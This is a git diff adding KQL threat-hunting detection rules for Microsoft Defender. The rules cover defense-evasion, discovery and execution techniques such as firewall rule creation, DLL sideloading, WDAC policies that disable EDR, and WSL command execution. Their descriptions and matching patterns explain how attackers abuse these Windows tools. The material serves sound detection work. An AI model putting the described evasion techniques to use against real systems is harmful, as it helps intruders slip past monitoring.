b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql new file mode 100644 index 00000000..7a55ac05 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql @@ -0,0 +1,13 @@ +// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet +// Author: frack113 +// Date: 2024-05-03 +// Level: low +// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting +// False Positives: +// - Administrator script + +DeviceProcessEvents +| where (ProcessCommandLine contains "New-NetFirewallRule " and ProcessCommandLine contains " -Action " and ProcessCommandLine contains "allow") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql new file mode 100644 index 00000000..00bd0c46 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql @@ -0,0 +1,12 @@ +// Title: Potential CommandLine Obfuscation Using Unicode Characters +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-01-15 +// Level: medium +// Description: Detects potential CommandLine obfuscation using unicode characters. +Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting + +DeviceProcessEvents +| where ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql new file mode 100644 index 00000000..2f96cedb --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql @@ -0,0 +1,13 @@ +// Title: Potential DLL Sideloading Activity Via ExtExport.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-26 +// Level: medium +// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. +It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". +Arbitrary DLLs can also be loaded if a specific number of flags was provided. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting + +DeviceProcessEvents +| where FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql new file mode 100644 index 00000000..fdebae7b --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql @@ -0,0 +1,16 @@ +// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative +// Date: 2020-10-05 +// Level: low +// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". +Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. +While this is often a legitimate action, this rule can be use to hunt for anomalies. +Muddy Waters threat actor was seeing using this technique. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe" + +DeviceProcessEvents +| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql new file mode 100644 index 00000000..d96fbbb5 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql @@ -0,0 +1,14 @@ +// Title: Potential Suspicious Execution From GUID Like Folder Names +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: low +// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. +Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting +// False Positives: +// - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not((FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or (FolderPath contains "\\{" and FolderPath contains "}\\") or (FolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql new file mode 100644 index 00000000..08a3a179 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql @@ -0,0 +1,15 @@ +// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-12-01 +// Level: medium +// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. +The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +These can be used for example in decrypting malicious payload for defense evasion. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting +// False Positives: +// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. + +DeviceRegistryEvents +| where RegistryKey contains "\\Shell\\Open\\Command" and (RegistryValueData contains ".AesCryptoServiceProvider" or RegistryValueData contains ".DESCryptoServiceProvider" or RegistryValueData contains ".DSACryptoServiceProvider" or RegistryValueData contains ".RC2CryptoServiceProvider" or RegistryValueData contains ".Rijndael" or RegistryValueData contains ".RSACryptoServiceProvider" or RegistryValueData contains ".TripleDESCryptoServiceProvider") and (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryValueData contains "System.Security.Cryptography." \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql new file mode 100644 index 00000000..7d19e144 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql @@ -0,0 +1,14 @@ +// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-17 +// Level: medium +// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. +// - Not every instance is considered malicious, but this rule will capture the malicious usages. + +DeviceProcessEvents +| where (ProcessCommandLine contains "DllRegisterServer" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((ProcessCommandLine contains ":\\Program Files (x86)" or ProcessCommandLine contains ":\\Program Files\\" or ProcessCommandLine contains ":\\Windows\\System32\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql new file mode 100644 index 00000000..6e4e0931 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql @@ -0,0 +1,14 @@ +// Title: Service Binary in User Controlled Folder +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-05-02 +// Level: medium +// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". +Attackers often use such directories for staging purposes. +This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. +Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting + +DeviceRegistryEvents +| where ((RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\AppData\\Roaming\\") and (RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\ImagePath") and (not((RegistryValueData contains "C:\\ProgramData\\Microsoft\\Windows Defender\\" and (RegistryKey endswith "\\Services\\WinDefend*" or RegistryKey contains "\\Services\\MpKs")))) and (not((((RegistryValueData contains "C:\\Users\\" and RegistryValueData contains "AppData\\Local\\Temp\\MBAMInstallerService.exe") and RegistryKey contains "\\Services\\MBAMInstallerService") or (RegistryValueData contains "C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe" and RegistryKey contains "\\Services\\ZoomCptService")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql new file mode 100644 index 00000000..60ecc659 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql @@ -0,0 +1,10 @@ +// Title: Set Files as System Files Using Attrib.EXE +// Author: frack113 +// Date: 2022-02-04 +// Level: low +// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting + +DeviceProcessEvents +| where ProcessCommandLine contains " +s " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql new file mode 100644 index 00000000..b3d1d905 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql @@ -0,0 +1,10 @@ +// Title: Terminate Linux Process Via Kill +// Author: Tuan Le (NCSGroup) +// Date: 2023-03-16 +// Level: medium +// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting + +DeviceProcessEvents +| where FolderPath endswith "/kill" or FolderPath endswith "/killall" or FolderPath endswith "/pkill" or FolderPath endswith "/xkill" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql new file mode 100644 index 00000000..b5e41b44 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql @@ -0,0 +1,19 @@ +// Title: Use Short Name Path in Command Line +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-07 +// Level: medium +// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations. +Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs. +When investigating, examine: +- Commands using short paths to access sensitive directories or files +- Web servers on Windows (especially Apache) where short filenames could bypass security controls +- Correlation with other suspicious behaviors +- baseline of short name usage in your environment and look for deviations + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process. + +DeviceProcessEvents +| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\")))) and (not(((InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe" or (ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veeam.backup.shell.exe" or (InitiatingProcessFolderPath endswith "\\WebEx\\webexhost.exe" or ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql new file mode 100644 index 00000000..4401f8f5 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql @@ -0,0 +1,13 @@ +// Title: WDAC Policy File Creation In CodeIntegrity Folder +// Author: Andreas Braathen (mnemonic.io) +// Date: 2025-01-30 +// Level: medium +// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting +// False Positives: +// - May occur legitimately as part of admin activity, but rarely with interactive elevation. + +DeviceFileEvents +| where InitiatingProcessIntegrityLevel =~ "High" and FolderPath contains ":\\Windows\\System32\\CodeIntegrity\\" and (FolderPath endswith ".cip" or FolderPath endswith ".p7b") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql new file mode 100644 index 00000000..483171eb --- /dev/null +++ b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql @@ -0,0 +1,14 @@ +// Title: CMD Shell Output Redirect +// Author: frack113 +// Date: 2022-01-22 +// Level: low +// Description: Detects the use of the redirection character ">" to redirect information on the command line. +This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082, detection.threat-hunting +// False Positives: +// - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment + +DeviceProcessEvents +| where (ProcessCommandLine contains ">" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")) and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe" or ProcessCommandLine contains "chrome-extension://" or ProcessCommandLine contains "\\.\\pipe\\chrome.nativeMessaging"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql new file mode 100644 index 00000000..72b33b7e --- /dev/null +++ b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: Net.EXE Execution +// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) +// Date: 2019-01-16 +// Level: low +// Description: Detects execution of "Net.EXE". +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting +// False Positives: +// - Likely + +DeviceProcessEvents +| where (ProcessCommandLine contains " accounts" or ProcessCommandLine contains " group" or ProcessCommandLine contains " localgroup" or ProcessCommandLine contains " share" or ProcessCommandLine contains " start" or ProcessCommandLine contains " stop " or ProcessCommandLine contains " user" or ProcessCommandLine contains " view") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/Discovery/process_discovery.kql new file mode 100644 index 00000000..a977aa0f --- /dev/null +++ b/KQL/rules-threat-hunting/Discovery/process_discovery.kql @@ -0,0 +1,14 @@ +// Title: Process Discovery +// Author: Ömer Günal, oscd.community, CheraaghiMilad +// Date: 2020-10-06 +// Level: low +// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. +Information obtained could be used to gain an understanding of common software/applications running on systems within the network + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1057, detection.threat-hunting +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/atop" or FolderPath endswith "/htop" or FolderPath endswith "/pgrep" or FolderPath endswith "/ps" or FolderPath endswith "/pstree" or FolderPath endswith "/top" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql new file mode 100644 index 00000000..4fc3d766 --- /dev/null +++ b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql @@ -0,0 +1,13 @@ +// Title: SC.EXE Query Execution +// Author: frack113 +// Date: 2021-12-06 +// Level: low +// Description: Detects execution of "sc.exe" to query information about registered services on the system +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1007, detection.threat-hunting +// False Positives: +// - Legitimate query of a service by an administrator to get more information such as the state or PID +// - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1" + +DeviceProcessEvents +| where (ProcessCommandLine contains " query" and (FolderPath endswith "\\sc.exe" and ProcessVersionInfoOriginalFileName =~ "sc.exe")) and (not(ProcessCommandLine =~ "sc query dokan1")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql new file mode 100644 index 00000000..0eba801e --- /dev/null +++ b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Tasklist Discovery Command +// Author: frack113 +// Date: 2021-12-11 +// Level: informational +// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1057, detection.threat-hunting +// False Positives: +// - Likely from users, administrator and different internal and third party applications. + +DeviceProcessEvents +| where ProcessCommandLine contains "tasklist" or FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql new file mode 100644 index 00000000..421a4caf --- /dev/null +++ b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql @@ -0,0 +1,15 @@ +// Title: System Information Discovery Via Wmic.EXE +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-19 +// Level: low +// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, +including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, +and GPU driver products/versions. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082, detection.threat-hunting +// False Positives: +// - VMWare Tools serviceDiscovery scripts + +DeviceProcessEvents +| where ((ProcessCommandLine contains "caption" or ProcessCommandLine contains "command" or ProcessCommandLine contains "driverversion" or ProcessCommandLine contains "maxcapacity" or ProcessCommandLine contains "name" or ProcessCommandLine contains "osarchitecture" or ProcessCommandLine contains "product" or ProcessCommandLine contains "size" or ProcessCommandLine contains "smbiosbiosversion" or ProcessCommandLine contains "version" or ProcessCommandLine contains "videomodedescription") and (ProcessCommandLine contains "baseboard" or ProcessCommandLine contains "bios" or ProcessCommandLine contains "cpu" or ProcessCommandLine contains "diskdrive" or ProcessCommandLine contains "logicaldisk" or ProcessCommandLine contains "memphysical" or ProcessCommandLine contains "os" or ProcessCommandLine contains "path" or ProcessCommandLine contains "startup" or ProcessCommandLine contains "win32_videocontroller") and ProcessCommandLine contains "get" and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")) and (not(InitiatingProcessCommandLine contains "\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql new file mode 100644 index 00000000..19469938 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql @@ -0,0 +1,14 @@ +// Title: Arbitrary Command Execution Using WSL +// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: medium +// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting +// False Positives: +// - Automation and orchestration scripts may use this method to execute scripts etc. +// - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql new file mode 100644 index 00000000..bfb6db93 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql @@ -0,0 +1,13 @@ +// Title: Cab File Extraction Via Wusa.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-04 +// Level: medium +// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported. + +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) + +DeviceProcessEvents +| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql new file mode 100644 index 00000000..18fcca0b --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql @@ -0,0 +1,12 @@ +// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. + +DeviceProcessEvents +| where FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\" and InitiatingProcessFolderPath endswith "\\dfsvc.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql new file mode 100644 index 00000000..1c82dc75 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql @@ -0,0 +1,14 @@ +// Title: Command Executed Via Run Dialog Box - Registry +// Author: Ahmed Farouk, Nasreddine Bencherchali +// Date: 2024-11-01 +// Level: low +// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. +This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. + +// MITRE Tactic: Execution +// Tags: detection.threat-hunting, attack.execution +// False Positives: +// - Likely + +DeviceRegistryEvents +| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (not(RegistryKey endswith "\\MRUList")) and (not(((RegistryValueData in~ ("%appdata%\\1", "%localappdata%\\1", "%public%\\1", "%temp%\\1", "calc\\1", "dxdiag\\1", "explorer\\1", "gpedit.msc\\1", "mmc\\1", "notepad\\1", "regedit\\1", "services.msc\\1", "winver\\1")) or RegistryValueData contains "ping"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql new file mode 100644 index 00000000..844268d6 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql @@ -0,0 +1,12 @@ +// Title: Dfsvc.EXE Network Connection To Non-Local IPs +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, detection.threat-hunting +// False Positives: +// - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\dfsvc.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql new file mode 100644 index 00000000..0d407fd5 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql @@ -0,0 +1,12 @@ +// Title: Import New Module Via PowerShell CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: low +// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - Depending on the environement, many legitimate scripts will import modules 